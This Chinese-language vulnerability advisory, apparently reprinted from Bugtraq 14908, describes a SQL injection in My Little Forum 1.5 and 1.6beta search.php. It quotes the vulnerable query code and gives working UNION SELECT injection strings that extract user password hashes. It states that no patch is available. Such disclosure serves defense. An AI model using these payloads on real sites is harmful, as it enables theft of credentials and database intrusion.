My Little Forum search.php 的远程 SQL注入漏洞

受影响系统：

my little homepage My Little Forum 1.6beta
my little homepage My Little Forum 1.5

描述：

BUGTRAQ  ID: 14908

My Little Forum是一款简单的WEB论坛程序。

My Little Forum中存在SQL注入漏洞，成功利用这个漏洞的攻击者可以完全入侵基础数据库系统。

在search.php的第144行：

...
$result = mysql_query("SELECT id, pid, tid, DATE_FORMAT(time + INTERVAL ".
$time_difference." HOUR,'".$lang['time_format']."') AS Uhrzeit,
DATE_FORMAT(time + INTERVAL ".$time_difference." HOUR, '".$lang['time_format']."')
AS Datum, subject, name, email, hp, place, text, category FROM ".$forum_table."
WHERE ".$search_string." ORDER BY tid DESC, time ASC LIMIT ".$ul.", "
.$settings['search_results_per_page'], $connid);
...

然后在搜索页面，选择“phrase”，然后键入：

[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,
user_pw, user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata where
user_name='[username]' /*

由于没有过滤$searchstring变量，如果关闭了magic quote的话，就可以得到任何管理员/用户口令哈希。

1.6beta版也受漏洞影响：
...
$result = mysql_query("SELECT id, pid, tid, UNIX_TIMESTAMP(time + INTERVAL \
".$time_difference." HOUR) AS Uhrzeit, subject, name, email, hp, place, text, \
category FROM ".$db_settings['forum_table']." WHERE ".$search_string." ORDER BY tid \
DESC, time ASC LIMIT ".$ul.", ".$settings['search_results_per_page'], $connid);
...

在注入字符串中删除语句，可得到同样的结果

[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,
user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata where
user_name='[username]' /*

厂商补丁：

my little homepage

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.mylittlehomepage.net/forum_script.html